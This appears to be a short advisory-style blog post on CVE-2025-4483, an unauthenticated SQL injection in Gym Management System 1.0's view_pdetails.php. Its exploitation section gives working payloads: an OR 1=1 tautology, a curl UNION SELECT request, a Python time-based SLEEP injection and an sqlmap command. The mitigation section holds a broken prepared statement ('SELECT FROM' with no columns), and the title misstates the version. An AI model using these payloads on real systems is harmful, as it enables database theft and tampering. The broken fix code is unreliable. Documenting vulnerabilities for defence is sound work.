Gym Management System 10, SQL Injection, CVE-2025-4483 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-4483 Works

This vulnerability exploits improper input sanitization in the `ID` parameter of `/view_pdetails.php` in Gym Management System 1.0. Attackers inject malicious SQL queries through crafted HTTP requests, manipulating database operations. The flaw allows unauthorized data access, modification, or deletion due to lack of prepared statements. Remote exploitation is possible without authentication, leading to full database compromise. The CVSS 4.0 vector (AV:N/AC:L/PR:N/UI:N) confirms network-based attacks with low complexity.

DailyCVE Form

Platform: Gym Management System
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 05/13/2025

What Undercode Say:

Exploitation

1. Craft SQL Payload:

' OR 1=1--

2. Exploit via cURL:

curl "http://target.com/view_pdetails.php?ID=1'+UNION+SELECT+1,user(),3--"

3. Automated Attack:

import requests
payload = "1' AND (SELECT 1 FROM (SELECT SLEEP(5))a)--"
response = requests.get(f"http://target.com/view_pdetails.php?ID={payload}")

Protection

1. Input Sanitization:

$id = mysqli_real_escape_string($conn, $_GET['ID']);

2. Prepared Statements:

$stmt = $conn->prepare("SELECT FROM members WHERE id = ?");
$stmt->bind_param("i", $_GET['ID']);

3. WAF Rules:

location ~ .php$ {
modsecurity_rules 'SecRule ARGS "@detectSQLi" deny';
}

Analytics

• Detection: Log monitoring for repeated UNION/SLEEP patterns.
• Mitigation: Patch via vendor update or disable `/view_pdetails.php` if unused.
• Tool: SQLmap command:

  sqlmap -u "http://target.com/view_pdetails.php?ID=1" --risk=3
  

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram